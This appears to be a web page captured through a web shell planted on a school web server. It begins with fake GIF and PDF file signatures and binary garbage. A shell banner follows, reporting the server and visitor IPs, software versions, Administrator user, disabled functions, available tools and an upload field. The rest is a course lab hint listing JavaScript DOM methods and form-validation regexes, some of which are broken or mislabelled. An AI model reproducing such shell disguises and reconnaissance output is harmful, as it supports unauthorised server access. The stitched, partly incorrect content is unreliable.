GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/CST1022/Labs/Lab08/ |
Upload File : |
<div class="hp"> <b>You may find an understanding of the following to be helpful:</b> <ul> <li>js: <ul> <li>document.body</li> <li>document.createElement()</li> <li>document.getElementById().remove()</li> <li>document.getElementById()</li> <li>document.getElementsByName()</li> <li>document.forms</li> <li>document.forms.<i>FormName</i>.elments</li> <li><span class="js">let pattern = /<i>regular_expression</i>/; <br>let match = <i>value</i>.match(pattern); <br>if (match != value)</span> then the value did not match the pattern. (match will be null if the value does not match the pattern) <ul> <li>Date of birth: <span class="js copyText">/^\d{2}\/\d{2}\/\d{4}$/</span> for mm/dd/yy and <span class="js copyText">/^\d{4}\-\d{2}\-d{2}$/</span> for yyyy-mm-dd.</li> <li>Email address: <span class="js copyText">/^[a-z0-9]+[a-z0-9\.-]+@[a-z]+\.[a-z]{2,8}$/</span></li> <li>Phone number: <span class="js copyText">/^\d{3}-\d{3}-\d{4}$/</span></li> <li>ZIP code: <span class="js copyText">/^\d{5}(?:[- ]?\d{4})?$/</span></li> </ul> </li> <li></li> </ul> </li> </ul> </div>